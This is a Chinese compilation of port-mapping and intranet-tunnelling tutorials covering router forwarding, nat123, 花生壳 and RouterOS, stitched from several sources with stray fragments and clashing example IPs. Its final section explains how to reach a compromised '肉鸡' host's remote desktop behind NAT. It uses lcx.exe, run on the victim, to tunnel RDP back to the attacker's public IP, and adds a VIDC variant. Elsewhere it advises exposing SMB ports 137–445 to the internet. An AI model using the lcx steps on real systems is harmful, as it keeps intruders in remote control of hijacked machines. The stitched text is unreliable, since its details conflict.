巧用端口映射 不通过网关开放任意内网(图)
花生棒端口映射实现内网穿透教程
花生棒端口映射实现内网穿透教程
内网环境下外网是无法访问内网主机的,但是如果使用动态域名解析就可以完美解决问题。
而实现动态域名解析穿透内网的第一步,就是要搞定端口映射,下面介绍一款用硬件搞定端口映射的方法:
使用花生棒对内网进行端口映射,实现外网与内网的通信。
工具:花生棒
步骤:
1.安装并登录花生棒绑定账号。
2.进入管理中心添加端口映射,内容设置如图。
3.生成外网访问地址。
4.外网总公司通过生成的外网访问地址即可访问子公司的服务了。
可在设备管理出查看具体信息。
全端口映射实现外网访问内网路由器教程
全端口映射实现外网访问内网路由器教程在内网使用全端口映射模式,将路由器地址映射到外网,在外网访问时,同时使用访问者打开访问端口进行访问。
全端口映射实现外网访问内网路由器的方法其实很简单,下面由店铺告诉你!全端口映射实现外网访问内网路由器的方法在内网明确路由器内网访问地址,并确保可以正常访问。
nat123端口映射之全端口映射。
在路由器内网任意一台服务器上安装nat123客户端并使用它使用自己的帐号进行登录。
如没有帐号,可以“注册帐号”进行注册。
登录后/主面板/端口映射列表/添加映射。
设置映射信息。
选择全端口映射模式。
内网地址是内网路由器访问地址。
外网地址域名可以是自己的域名,或免费二级域名,鼠标放在输入框上有提示。
全端口映射p2p模式是免费模式。
全端口映射转发p2p是VIP模式,需要购买支持全端口映射的VIP才能使用。
保存映射信息后,可以查看映射图标状态信息,一般几分钟内映射生效。
可以将鼠标放在映射图标上,会出现状态提示信息。
当映射提示正常后,说明映射已成功。
记下外网地址域名,访问时需要。
在访问端,同样需要安装nat123客户端,并启用访问者。
访问者打开路由器访问域名和访问端口。
域名是映射后的域名,端口跟路由器内网访问端口一样。
如在添加访问地址时,同时勾选允许局域网访问,则在访问者局域网内都可以访问。
查看访问者状态。
鼠标放在访问者图标上,提示当前状态信息。
在访问者本地,可以进行访问路由器应用了。
域名地址和127地址都可以实现访问。
END。
怎么设置内网端口映射
怎么设置内网端口映射
因为需要让内网搭建的服务被外网访问,内网用户需要要做端口映射,下面店铺给大家介绍内网用户设置内网端口映射的方法!
内网用户设置内网端口映射的方法
首先确保下内网网络是不是正常。
在内网安装后登录。
打开内网映射。
添加映射,应用名称随意,内网主机就是被公网访问的那台电脑IP地址,内网端口就是希望被映射的端口,点击确定,就启动端口映射了。
此时端口映射窗口会添加一条映射记录,外网访问地址生成:
外网只需要使用这个域名+端口,就可以访问内网的主机,内网端口映射就此完成。
外网访问内网
外网访问内网概述随着互联网和网络技术的发展,许多企业和个人都开始使用内部网络(内网)来处理和存储敏感数据和资源。
然而,有时候需要从外部访问这些内部网络中的资源,例如远程办公、远程桌面控制等。
本文将探讨外网访问内网的几种常见方法和相应的安全措施。
一、端口映射端口映射是最简单和常见的外网访问内网的方法之一。
它通过将外部网络(公网)中的某个端口与内部网络中的特定设备或服务绑定起来,实现数据的传输。
具体步骤如下:1. 在内部网络的路由器或防火墙上配置端口转发规则。
将要访问的端口映射到内部网络中的目标设备或服务上。
2. 在外部网络中,通过访问内部网络的公网IP地址以及映射的端口号进行访问。
尽管端口映射简单易用,但也存在一定的安全风险。
由于内部设备或服务直接暴露在公网上,可能会受到入侵者的攻击。
因此,在配置端口映射时,应注意配置合适的访问控制策略,比如限制访问IP、使用强密码等。
二、虚拟专用网络(VPN)虚拟专用网络(VPN)是一种通过公网来建立安全连接的方法。
使用VPN,外部用户可以通过公网与内部网络建立加密的隧道,使得外部用户能够安全地访问内部网络中的资源。
要实现外网访问内网的VPN,需要在网络中建立一个VPN服务器和相应的VPN客户端。
具体步骤如下:1. 在内部网络中,搭建VPN服务器。
配置用户认证、加密算法等参数。
2. 配置VPN客户端,使其能够与服务器建立安全连接。
3. 在外部网络中,使用VPN客户端连接到VPN服务器,并通过VPN隧道访问内部网络中的资源。
使用VPN的优点是它提供了一种安全的外网访问内网的方法,数据在传输过程中通过加密保护,可以防止黑客窃取敏感信息。
同时,VPN还可以提供身份认证和访问控制等功能,增强网络安全性。
三、反向代理反向代理是一种通过将外部网络请求转发到内部网络的方法。
它隐藏了内部网络的真实地址和结构,只暴露一个公网IP地址给外部网络,可以提高内部网络对外部网络的安全性。
常见路由器端口映射图解
常见路由器端口映射图解常见路由器端口映射图解1·简介路由器端口映射是一种网络配置技术,通过将外部网络的端口与内部网络的设备端口进行绑定,实现了外部网络与内部设备之间的通信。
本文将介绍常见路由器端口映射的概念、原理、配置方法以及注意事项。
2·端口映射的原理端口映射的原理是通过将路由器的外部端口与内部设备的端口进行绑定,将外部网络发送到路由器的数据包转发到正确的内部设备上。
这样,内部设备可以与外部网络进行通信。
3·端口映射的分类3·1·单端口映射单端口映射是将外部端口映射到内部设备的一个特定端口上。
当外部网络发送数据包到这个端口时,路由器会将数据包转发到内部设备上。
3·2·端口范围映射端口范围映射是将外部端口范围映射到内部设备的一组连续端口上。
当外部网络发送数据包到这个端口范围时,路由器会将数据包转发到内部设备上。
4·配置路由器端口映射的方法4·1·登录路由器管理界面首先,需要登录路由器的管理界面。
通常可以通过输入路由器的IP地质在浏览器中打开管理界面。
4·2·找到端口映射设置在路由器管理界面中,找到端口映射设置的选项。
它可能会在不同的位置,根据不同型号和品牌的路由器而有所不同。
4·3·添加端口映射规则进入端口映射设置界面后,添加新规则或类似按钮。
根据需要,选择单端口映射或端口范围映射,并填写相应的外部端口和内部设备的端口。
4·4·保存配置并应用配置完端口映射规则后,保存或应用按钮。
路由器将会保存配置,并开始应用端口映射规则。
5·注意事项5·1·内网设备开启服务在进行端口映射之前,需要确保内部设备已经开启了相应的服务。
否则,在进行端口映射后,外部网络无法正常与内部设备进行通信。
5·2·外部端口冲突在配置端口映射时,需要注意外部端口是否与其他设备或服务冲突。
如何利用路由器的端口映射
如何利用路由器的端口映射
许多人都喜欢在自己的个人计算机上设置一个网站或者邮箱系统,但是出于隐私的考虑又不想其他人访问,所以你只需要在路由器上设置一下映射就可以了,路由器一个和连接路由的电脑即可完成,具体的操作步骤如下:
打开路由器的控制界面,显示界面。
然后进入转发规则栏目并选择虚拟服务:
这里你稍微了解一下各栏目所介绍的一些信息,比如第一个是服务端口号指的就是你创建的服务器的开放端口号,而IP地址值得就是你的内网IP,一般默认的是
192.168.1.* ,填写完这些必要的信息之后,点击选择生效并保存,重新启动路由器就OK 了。
实际上,不同的牌子和型号的路由器稍微有些差异,但是栏目的设置大抵是上述的那样,在设置的时候再参考一下说明书就可以万无一失。
另一个问题是链接IP是动态的IP,当我们访问网站的时候,就需要我们安装一个动态的IP服务软件才能实现访问外部网络的功能。
以上就是带给大家不一样的精彩。
想要了解更多精彩的朋友可以持续关注,我们将会为你奉上最全最新鲜的内容哦! ,因你而精彩。
感谢您的阅读,祝您生活愉快。
端口映射内网映射外网访问怎么设置
端口映射内网映射外网访问怎么设置
端口映射内网映射外网访问实现外网访问内网应用。
只要明确内网访问地址,即可映射为外网地址访问。
端口映射内网映射外网访问的方法其实很简单,下面由店铺告诉你!
端口映射内网映射外网访问的方法
明确自己的内网应用地址和应用类型,且在内网是可以正常访问的。
应用类型大概可分为80,https443,不需要收录的网站如OA,普通TCP如远程桌面,UDP协议应用如DOTA联机和CS和手机MC联机……在内网安装并启用nat123客户端
登录客户端后添加映射,选择适用自己的映射类型,将内网地址映射为外网地址
保存后,可以将鼠标停留映射图标上看状态刷新,等待一会即可映射成功后,通过映射后的外网域名地址即可在任意上网环境访问。
如映射的是网站,浏览器访问映射后域名即可。
对于部分应用多个端口的,需要同时映射多个端口,在外网才能正常访问,如FTP和视频监控等
END。
内网配置nat端口映射,实现异地远程访问控制内网电脑计算机PC
内网配置nat123端口映射,实现异地远程访问控制内网电脑计算机PC————————————————————————————————作者:————————————————————————————————日期:2内网配置nat123端口映射,实现异地远程访问控制内网电脑计算机PC当服务器没有公网IP时,怎么在外网远程控制访问?内网电脑计算机PC在外网怎么访问?解决方案:通过nat123端口映射达到在外网环境下远程访问控制内网电脑计算机PC。
详细处理过程方法参考如下示例:1.确认在局域网内远程正常:此为Windows环境参考内网PC(192.168.1.21)设置允许远程控制。
计算机属性/远程设置,启动远程桌面允许。
明确内网PC(192.168.1.21)远程桌面端口。
默认是3389,可以在注册表修改。
“开始”→“运行”→输入“regedit” 回车,进入注册表,找到这个路径HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStations\RD P-Tcp\修改参数PortNamber参数是默认是16进制的,hexadecimal 改为decimal 可以变成10进制,默认端口是3389可以自己修改。
设置远程登录用户密码。
控制面板/用户帐户,设置administrator用户密码(或添加配置其他用户密码)。
测试内网远程登录。
内网成功远程控制。
2.配置nat123端口映射:内网局域网环境登录nat123,端口映射添加。
添加映射,内网地址:(192.168.1.21主机IP或名称),内网端口(3389),外网网址(为空),外网端口(33333,可10000-65535之间自定义)。
确认保存成功后,关闭添加映射窗口,查看端口映射列表。
显示已添加端口映射信息。
显示此外网网址(113.10.159.162)是自动分配的公网IP。
如何用端口映射解决内网IP问题
如何用端口映射解决内网问题
当处于内网环境又想要搭建只有在公网环境下才能搭建的服务的时候,就需要使用到端口映射,把内网用动态域名解析到外网,从而完成内外网的互通。
但是端口映射这个操作很容易出错,有没有更简单的办法呢?当然有,请看下面的介绍:
使用花生壳对内网进行端口映射,实现外网与内网的通信。
1.首先确保下内网网络是不是正常。
2.在内网下载最新客户端,安装后登录。
3.打开内网映射。
4.添加映射,应用名称随意,内网主机就是被公网访问的那台电脑IP地址,内网端口就是希望被映射的端口,点击确定,就启动端口映射了。
此时端口映射窗口会添加一条映射记录,外网访问地址生成:
外网只需要使用这个域名+端口,就可以访问内网的主机。
绿盾:端口映射图解
端口映射1. 什么是端口映射?端口映射又称端口转发。
端口映射过程就如同你家在一个小区里B栋2410室,你朋友来找你,找到小区门口,不知道你住哪层哪号?就问守门的保安,保安很客气的告诉了他你家详细门牌号,这样你朋友很轻松的找到了你家。
这个过程就是外网访问内网通过端口映射的形象说法。
2. 为什么要做端口映射?目前的网络接入主要有2种:1.ADSL连接猫再直接连接主机,这种情况主机是直接进行ADSL宽带拨号,连接上网通过运行CMD执行ipconfig /all命令可以查看到,PPP拨号连接所获取到得是一个公网IP地址,这种类型的网络是不需要做端口映射的(如图)2.ADSL通过路由器来进行拨号,主机通过路由器来进行共享上网,这种情况下主机获取到得通常会是一个192.168.x.x类型的私有内网IP地址,这类情况下,是需要在路由器做端口映射,转发端口到对应的服务器上;3内网IP的端口映射设置方法一要进行端口映射,首先需要了解清楚服务程序所需要映射的端口是多少以下列举了部分服务需要映射的默认服务端口号网站TCP80FTP TCP21(控制端口) TCP20(此端口为数据传输端口,不需要映射)管家婆财务软件TCP211 TCP80 TCP1433海康威视硬盘录像机TCP80(WEB端口)TCP8000(视频数据端口)邮件服务SMTP TCP25 POP3 TCP110MSSQL数据库TCP1433视频采集卡不同厂家所使用的默认端口均不一样5050 8000 9000-9002 37777等TP-Link、D-Link、LINKSYS主流品牌端口映射设置3.1 Tp-link R460+内网192.168.1.101是WEB服务器,TP-LINK系列路由器的默认管理地址为192.168.0.1,账号admin密码admin 登录到路由器的管理界面,点击路由器的转发规则—虚拟服务器—添加新条目(如图)。
端口映射设置如下:服务端口号填写80,如果填写为80-82则代表映射80、81、82端口,IP地址填写内网WEB服务器的IP地址192.168.1.101,协议设置为TCP,若对端口协议类型不了解可以设置选择为ALL,代表所有(包括TCP 和UDP),状态必须设置为生效。
教你如何在路由器上设置端口映射?开启路由器端口映射的教程
教你如何在路由器上设置端口映射?开启路由器端口映射 的教程
路由器上设置端口映射相对于花生壳会更快更稳定,因为花生壳的映射原理属于转发的,就是所有的数据都要经过花生 壳,这样无形中就浪费很多时间。现在来教你如何开启路由器上的端口映射。 1、首先你要有路由器完全权限路由器账号。是否是完全权限的账号,你只要跟着我来做,就知道了,没有完全权限的账户是没有端口映射功能的。这样 的话你就只能用第三方的端口映射工具,比如新花生壳。 2、输入路由器的地址,一般默认都是 192.168.1.1。登录路由器管理界面。
3、进去的时候,一般是在“应用”--“高级NAT配置”里,点击“虚拟主机配置”选项。
4、图中看出,我现在映射的端口为4600,映射的主机是我本机,192.168.1.46,按确定之后就生效了。
ห้องสมุดไป่ตู้
Windows端口映射实现外网访问内网
Windows端口映射实现外网访问内网由于公网IP地址有限,不少ISP都采用多个内网用户通过代理和网关路由共用一个公网IP上INTERNET的方法,这样就限制了这些用户在自己计算机上架设个人网站,要实现在这些用户端架设网站,最关键的一点是,怎样把多用户的内网IP和一个他们唯一共享上网的IP进行映射!就象在局域网或网吧内一样,虽然你可以架设多台服务器和网站,但是对外网来说,你还是只有一个外部的IP地址,怎么样把外网的IP映射成相应的内网IP地址,这应该是内网的那台代理服务器或网关路由器该做的事,对我们用私有IP地址的用户也就是说这是我们的接入ISP服务商(中国电信、联通、网通、铁通等)应该提供的服务,因为这种技术的实现对他们来说是举手之劳,而对我们来说是比较困难的,首先得得到系统管理员的支持才能够实现。
因为这一切的设置必须在代理服务器上做的。
要实现这一点,可以用Windows 2000 Server 的端口映射功能,除此之外Winroute Pro 也具有这样的功能,还有各种企业级的防火墙。
而对于我们这些普通用户,恐怕还是用Windows 2000 Server最为方便。
先来介绍一下NAT,NAT(网络地址转换)是一种将一个IP地址域映射到另一个IP地址域技术,从而为终端主机提供透明路由。
NAT包括静态网络地址转换、动态网络地址转换、网络地址及端口转换、动态网络地址及端口转换、端口映射等。
NAT常用于私有地址域与公用地址域的转换以解决IP地址匮乏问题。
在防火墙上实现NAT后,可以隐藏受保护网络的内部拓扑结构,在一定程度上提高网络的安全性。
如果反向NAT提供动态网络地址及端口转换功能,还可以实现负载均衡等功能。
端口映射功能可以让内部网络中某台机器对外部提供WWW服务,这不是将真IP地址直接转到内部提供WWW服务的主机,如果这样的话,有二个蔽端,一是内部机器不安全,因为除了WWW之外,外部网络可以通过地址转换功能访问到这台机器的所有功能;二是当有多台机器需要提供这种服务时,必须有同样多的IP地址进行转换,从而达不到节省IP 地址的目的。
路由器内网IP怎么端口映射到外网
路由器内网IP怎么端口映射到外网
路由器分配的是内网IP,如何做端口映射,实现外网访问内网?下面是店铺给大家整理的一些有关路由器内网IP端口映射到外网的方法,希望对大家有帮助!
路由器内网IP端口映射到外网的方法
(已有网站正常访问的可省略这步骤)搭建网站环境应用,新手可使用phpstudy这类的集成WEB包,免去各种复杂的配置环境。
确保内网网站应用正常运行在局域网内正常访问
在内网安装使用nat123客户端启用
登录客户端添加映射,如网站需要考虑收录使用80映射,如是办公OA和ERP等不需要收录网站使用非80网站映射方式;客户端原理是将网站内网地址映射到外网域名地址访问。
映射保存成功后,只要有联网上网的电脑,即可通过映射后的外网地址访问到对应的内网网站应用。
END。
如何设置无线路由器的端口映射(二)
如何设置无线路由器的端口映射现如今,无线路由器已经成为家庭和办公室网络的基础设备之一。
它可以提供无线网络连接,连接多台设备,实现互联网分享。
但是,有时我们需要让特定的应用程序或设备在局域网中能够通过公网进行访问,这时就需要通过端口映射来实现。
本文将介绍如何设置无线路由器的端口映射。
一、什么是端口映射在计算机网络中,每个应用程序或服务都会使用特定的端口进行通信。
端口映射就是将公网的某个端口与局域网中的某个设备或应用程序的端口绑定。
通过这种方式,公网上的请求可以被路由器转发给局域网中的目标设备,实现对该设备或应用程序的访问。
二、寻找路由器的管理界面要设置无线路由器的端口映射,首先需要找到路由器的管理界面。
通常情况下,你可以在浏览器的地址栏中输入路由器的IP地址,或者通过查看路由器的说明书或标签上的信息找到它。
输入正确的IP地址后,将会跳转至路由器管理界面的登录页面。
三、登录路由器管理界面在登录页面上,输入正确的用户名和密码,点击登录按钮即可进入路由器的管理界面。
如果你没有更改过默认密码,可以尝试使用默认的用户名和密码进行登录。
一旦登录成功,你就可以进行路由器的设置和配置。
四、查找端口映射设置选项在路由器管理界面中,不同品牌和型号的路由器可能会有不同的界面布局和菜单选项。
通常,你可以在“高级设置”或“高级配置”之类的选项中找到“端口映射”或“端口转发”的设置。
有些路由器还会提供“虚拟服务器”或“应用程序触发”等类似的功能,请根据自己的路由器型号找到相应的选项。
五、添加端口映射规则一旦找到了端口映射设置选项,你需要点击相应的按钮或链接以添加新的端口映射规则。
在这一步骤中,你需要填写一些信息,包括公网端口、局域网端口以及目标设备的IP地址等。
具体的填写步骤和参数要根据你要实现的映射需求和所使用的路由器而定,在这里无法一一列举。
六、保存并应用设置完成所有的端口映射规则添加后,你需要保存并应用这些设置。
某些路由器会在每次修改设置时需要你点击“保存”按钮,并在确认修改后重新启动路由器。
不用端口映射从外网访问内网的文件共享
不用端口映射从外网访问内网的文件共享第一篇:不用端口映射从外网访问内网的文件共享不用端口映射从外网访问内网的文件共享网上很多文章介绍如何在路由器上做端口映射,来实现从外网访问内网的文件共享,但现实是很多上网的用户无法操作路由器,而且即使可以操作路由器,但路由器本身获取到的IP还是一个内网的IP,做了端口影射也没有用,这样的情况能从外网穿透内网路由器访问内网的文件共享吗?答案是肯定的,不仅能,而且很简单!就2步首先在自己电脑上做一个VPN服务其次申请一个苹果茶内网共享服务在电脑上运行。
在外网就可以远程穿透内网加入你这个VPN服务,既然加入进来了,就属于同一个局域网了,自然就可以实现文件共享。
先在你本机建立VPN服务器,建立步骤是:网上邻居,右键点属性,选择创建一个新连接,然后选择设置高级连接再选择接受传入的连接--允许专用虚拟连接—选择用户-下一步完成,你这个电脑的VPN服务就启用了。
VPN服务的端口是1723 你去申请个苹果茶服务,把你这个端口在苹果茶设置下,苹果茶的功能就是一个内网隧道,把你内网变成外网,则你在外网用手机或者电脑都可以连接你刚才建立的VPN服务器了,也就是成了一个局域网了。
第二篇:不用端口映射从外网访问内网的FTP服务的方法不用端口映射从外网访问内网的FTP服务的方法网上很多文章介绍如何在路由器上做端口映射,来实现从外网访问内网的FTP服务,但现实是很多上网的用户无法操作路由器,而且即使可以操作路由器,但路由器本身获取到的IP还是一个内网的IP,做了端口影射也没有用,这样的情况能从外网穿透内网路由器访问内网的FTP服务吗?答案是肯定的,不仅能,而且很简单!就1步申请一个苹果茶内网共享服务在电脑上运行。
在外网就可以远程穿透内网访问你这个FTP服务 FTP服务的端口是 20和21, 你去申请个苹果茶服务,把你这个端口在苹果茶设置为20和21,苹果茶的功能就是一个内网隧道,把你内网变成外网,则你在外网用手机或者电脑都可以连接你刚才建立的FTP服务了。
开启端口映射从外网访问内网的文件共享
开启端口映射从外网访问内网的文件共享开启端口映射,从外网访问内网的文件共享:已经在路由器里开了远端WEB管理设了端口,另外端口映射局域网里的一台电脑,比如WEB端口设的是8080,映射192.168.1.100到4877端口,现在我想访问局域网的共享文件,怎么弄?以前我的做法是远程控制软件比如teamviewer或者radmin控制内网一台电脑后再通过其访问内网,缺点是要装软件,有办法直接通过网关访问内网共享文件夹吗?答:开启137、138、139、445这四个端口映射即可。
若路由器的IP地址为172.19.1.70,而你机器的IP为:192.168.0.12,那就把路由器的137、138、139、445端口分别映射为你自己机器上的137、138、139、445端口,既是172.19.1.70:137映射到192.168.0.12:137、172.19.1.70:138映射到192.168.0.12:138、172.19.1.70:139映射到192.168.0.12:139、172.19.1.70:445映射到192.168.0.12:445,这个四个映射。
这样当外网访问//172.19.1.70这个地址时就自动转为访问你自己的机器//192.168.0.12。
以下为原理:WinXP共享需要137、138、139,4451、137端口这个端口是用来请求NetBios名到IP地址达。
比如有人喊“123计算机您共享C盘下的ABC.doc这个文件的IP地址是多少”。
于是这个呐喊被广播,只有IP地址是123的回答了。
2、138端口这个端口是您浏览[网络邻居]用达。
您网络里有台计算机叫主浏览器计算机维护着共享列表。
所以这个端口封了也就不能通过[网络邻居]来查看其他计算机喽。
当然并不防碍彼此通信。
3、139、445端口通信计算机得到了对方的IP地址以后,就用139或者445端口开始通讯了。
如果不是域环境,就是SMB调用139端口通讯。
维控人机通过IP地址端口映射实现MODBUS外网访问内网
维控人机通过IP地址端口映射实现MODBUS外网访问内网以公司的路由器RouteOS系统为例1外网访问路由器的公网,再通过路由器的NAT进行公网IP和内网IP进行地址和端口的映射,达到外网访问内网。
(图1,图2)是路由器上公网IP和内网IP的地址和端口映射图(注:型号不同的路由器设置的方式不同,但原理一样)(图1)(图2)2.从机工程设置(MODBUS TCP MASTER) 通讯口配置工程参数设置3.主机工程设置工程参数以下是附带RouterOS 端口映射说明:RouterOS 端口映射(远程桌面)Ros 2张网卡分别是lan和wan,地址为192.168.1.1和10.0.0.1假设外网ip为:10.0.0.1 内网有ip为192.168.10.5的机器要外网远程桌面过来,则需将外网10.0.0.1 的3389端口映射到192.168.1.1的3389上,当然外网端口可以设置为其他端口。
一:进入IP-firewall-nat 点击+号添加一条NAT规则。
二:设置chain=dstnat,dst-address=10.0.0.1 ,protocol=tcp ,dst-port=3389 。
三:进入action选项卡,设置action=dst-nat ,to-address=192.168.10.5 ,to-port=3389 。
ros shell 设置方法:[admin@MikroTik] ip firewall nat > add chain=dstnat dst-address=10.0.0.1 protocol=tcp dst-port=3389 action=dst-nat to-addresses=192.168.10.5 to-ports=3389这样内网的192.168.10.5的机器3389端口就映射到ros上了,可以直接运行mstsc远程桌面了,地址填写ros外网ip就OK了。
内网端口映射使用教程
内网端口映射使用教程
常见使用的网络环境包括动态公网、端口受限制、内网环境,以下一一步骤示例说明
如何实现外网的访问。
如果不清楚自己网络环境的小白,直接按照内网环境操作步骤即可。
动态公网环境下花生壳的使用。
登录客户端使用,默认分配的是不可修改的一个二级
域名,此域名会与本地最新公网IP地址定时刷新,访问域名即相当于访问到本地公网。
使用后,同时需要在路由器上做下路由映射,让设置允许外网访问对应内网端口地址。
动态公网环境下nat123动态域名解析的使用方式。
同上原理,安装客户端使用并添
加一个动态域名解析记录,此方式可以直接使用自己的域名,当在添加动态解析记录时使用。
对于公网端口受限和无公网的内网环境,在内网安装nat123客户端并在客户端添加
端口映射,将内网访问地址映射至外网地址,如有自己的域名,在外网地址可填写使用自
己的域名
动态解析使用的注意:先确保本地公网IP可以直接访问。
内网端口映射的使用注意:先确保本地应用在内网的正常访问。
END
感谢您的阅读,祝您生活愉快。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
巧用端口映射不通过网关开放任意内网(图)
有时候大家遇到一些肉鸡开了3389端口却发现连接不进去,后来才知道那台肉鸡是台内网的服务器.所以才会导致我们外网连接不进去.遇到此问题就是用lcx.exe端口转向工具吧!本机用方法是先将下载的lcx.exe解压在C盘的根目录下面,然后运行cmd命令符,连续两次输入“ cd.. ”我们就进入到了C盘根目录的命令符了。
接着我们运行" lcx
-listen 3030 5000 " 此命令意思是3030为转发端口, 5000为本机未被占用的端口,输入之后不用关闭cmd窗口。
肉鸡电脑的使用方法也是先将lcx.exe解压在C盘的根目录下面,然后运行cmd命令符,连续两次输入“ cd.. ”我们就进入到了C盘根目录的命令符了。
接着我们运行“ lcx -slave 113.83.62.178 3030 192.168.0.110 3389” 113.83.62.178 是本机的外网
IP地址,3030为转发端口,192.168.0.110为肉鸡的内网IP地址,3389就是肉鸡的远程终端端口。
此命令的意思是将肉鸡的3389转发到本机的3030端口,而本机又将3030端口转发为5000端口。
完成上面的步骤之后我们打开mstsc登陆器直接输入127.0.0.1:5000即可登录肉鸡的3389终端。
=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_++++++++++++++++
今天给大家说说如何巧用端口映射,不通过网关开放内网的方法。
一:使用前提
需要有一台公网的IP。
假如现在我们有一台公网的IP :210.210.21.21
二:用到的工具
1.lcx.exe
2. vdic
工具下载地址:/zxzgcn/to/ys.rar
三:方法讲解
方法一:用lcx.exe进行映射。
(1)我们将lcx.exe传到公网IP上,在公网IP上DOS环境下执行 lcx –listen 端口1 端口2
如lcx –listen 3030 3166 见下图
此命令的意思是监听3030端口和3166端口,以便和外部进行连接。
(2)将lcx.exe下载到要开放的内网的计算机上,然后在DOS环境下执行 lcx –slave 公网IP 端口内网IP 端口
如lcx -slave 211.211.21.21 3030 172.16.32.153 80 见下图:
解释一下,这句话的意思是说将内网计算机IP为 172.16.32.153 的80端口(也就是WEB 服务端口)
映射到公网IP为210.210.21.21的3030端口上,这样,内网和公网的计算机就建立起了连接。
如果你
内网计算机提供WEB服务,现在,只要通过外网IP 210.210.21.21和端口3166 可以访问内网的网站了。
如图开放IP前,访问地址 http://172.16.32.153/index.htm
开放IP后,访问地址 http://210.210.21.21:3166/index.htm 见下图
方法二:用VIDC
我们将vidcs.exe传到公网IP上,在公网计算机上运行vidcs –p端口,如vdics –p5205见下图
这句话的意思是在公网计算机上监听端口 5205 然后回到内网计算机上,直接点击运行vIDCc.exe,见下图
解释一下上面的设置: VIDC服务IP,指运行了vidcs.exe进行监听了端口的IP地址,端口指是在公网上
监听的端口,上面我监听的是5205端口,bindip指你要开放出去的内网的IP, Bind端口指你内网计算机
需要开放的端口(FTP服务器端口为21, WEB 服务端口为80, mail服务端口25)你想开放哪个就填哪个吧。
映射端口指你想通过公网哪个端口提供服务。
端口由你定,填好之后,我们点”连接”,马上就到收到提示
Success to Connect(210.210.21.21:5205,ver:1.2), 说明连接成功。
继续点”bind”,同样会收到成功的提示。
这样,你的机子的80端口就开放出去了。
访问方法 http://公网ip:映射端口。
如 http://210.210.21.21:8080 见下图
上面就是两种不通过网关开放内网的方法,不知道大家理解没有,如果有什么不懂的地方,可以联系我.。